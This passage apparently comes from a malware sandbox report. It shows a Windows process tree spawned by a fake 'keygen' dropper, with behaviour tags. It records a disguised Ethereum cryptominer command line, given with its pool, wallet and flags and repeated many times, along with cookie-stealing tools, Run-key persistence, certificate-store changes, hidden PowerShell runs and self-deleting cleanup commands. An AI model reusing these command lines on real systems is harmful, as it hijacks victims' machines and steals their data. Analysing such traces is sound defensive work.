                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                              4⤵
                                                                                                                                PID:5988
                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                4⤵
                                                                                                                                  PID:7064
                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                  4⤵
                                                                                                                                    PID:5732
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                    4⤵
                                                                                                                                      PID:348
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                      4⤵
                                                                                                                                        PID:2092
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                        4⤵
                                                                                                                                          PID:1328
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                          4⤵
                                                                                                                                            PID:4404
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                            4⤵
                                                                                                                                              PID:6840
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                              4⤵
                                                                                                                                                PID:6184
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                4⤵
                                                                                                                                                  PID:6484
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5820
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1168
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                      4⤵
                                                                                                                                                        PID:4140
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                        4⤵
                                                                                                                                                          PID:6116
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                          4⤵
                                                                                                                                                            PID:6936
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3496
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2772
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2304
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4056
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:340
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\cesewba
                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\cesewba
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5132
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:3892
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:2184
                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:212
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:192
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:196
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-5I6PU.tmp\Install.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-5I6PU.tmp\Install.tmp" /SL5="$400D4,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:3900
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-1FB8U.tmp\Ultra.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-1FB8U.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:192
                                                                                                                                                                        • C:\Program Files\Windows Multimedia Platform\FHAWFXNBUB\ultramediaburner.exe
                                                                                                                                                                          "C:\Program Files\Windows Multimedia Platform\FHAWFXNBUB\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:3148
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-QTCO8.tmp\ultramediaburner.tmp
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-QTCO8.tmp\ultramediaburner.tmp" /SL5="$301A0,281924,62464,C:\Program Files\Windows Multimedia Platform\FHAWFXNBUB\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:4128
                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:4180
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\d0-5db4b-008-2b4a2-5c02beee46971\Gedaelaenofa.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\d0-5db4b-008-2b4a2-5c02beee46971\Gedaelaenofa.exe"
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:4172
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\39-49d7f-948-23f91-e4c85f4afe00d\Nedujaezhaera.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\39-49d7f-948-23f91-e4c85f4afe00d\Nedujaezhaera.exe"
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:4256
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubd31cos.4tw\sskiper.exe /s & exit
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:4160
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ubd31cos.4tw\sskiper.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ubd31cos.4tw\sskiper.exe /s
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:4048
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1902107571.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1902107571.exe
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:4192
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\817694593.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\817694593.exe
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:6952
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\ubd31cos.4tw\sskiper.exe & exit
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:6516
                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                    ping 0
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                    PID:6928
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5imbn1qk.5dn\KiffMainE1.exe & exit
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:3868
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5imbn1qk.5dn\KiffMainE1.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5imbn1qk.5dn\KiffMainE1.exe
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5032
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vduk21bv.skz\001.exe & exit
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:5084
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vduk21bv.skz\001.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\vduk21bv.skz\001.exe
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5024
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ocmtayx.oia\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4844
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ocmtayx.oia\installer.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4ocmtayx.oia\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      PID:2496
                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4ocmtayx.oia\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4ocmtayx.oia\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619846328 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:5320
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3axnakxo.rbw\gpooe.exe & exit
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5348
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3axnakxo.rbw\gpooe.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3axnakxo.rbw\gpooe.exe
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:5708
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5860
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:6136
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2kvhedq5.aep\google-game.exe & exit
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5996
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2kvhedq5.aep\google-game.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\2kvhedq5.aep\google-game.exe
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:5212
                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:5456
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wnb4av3d.for\y1.exe & exit
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:5984
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\wnb4av3d.for\y1.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\wnb4av3d.for\y1.exe
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:5648
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\YVtoXhUQmI.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\YVtoXhUQmI.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                    PID:6212
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1620105660082.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1620105660082.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620105660082.txt"
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:6560
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\YVtoXhUQmI.exe"
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:6800
                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                          ping 127.0.0.1 -n 3
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                          PID:6836
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\wnb4av3d.for\y1.exe"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:2916
                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                          PID:6192
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12ze1sjv.dby\askinstall39.exe & exit
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:5252
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\12ze1sjv.dby\askinstall39.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\12ze1sjv.dby\askinstall39.exe
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:3816
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:5628
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:6340
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fyynarmt.4gn\setup.exe & exit
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:2172
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\fyynarmt.4gn\setup.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\fyynarmt.4gn\setup.exe
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:5456
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2jhuo0u1.1tc\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:5704
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2jhuo0u1.1tc\SunLabsPlayer.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2jhuo0u1.1tc\SunLabsPlayer.exe /S
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                PID:5472
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:6312
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:6296
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:5692
                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:5456
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:4964
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:7164
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC81A.tmp\tempfile.ps1"
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:5828
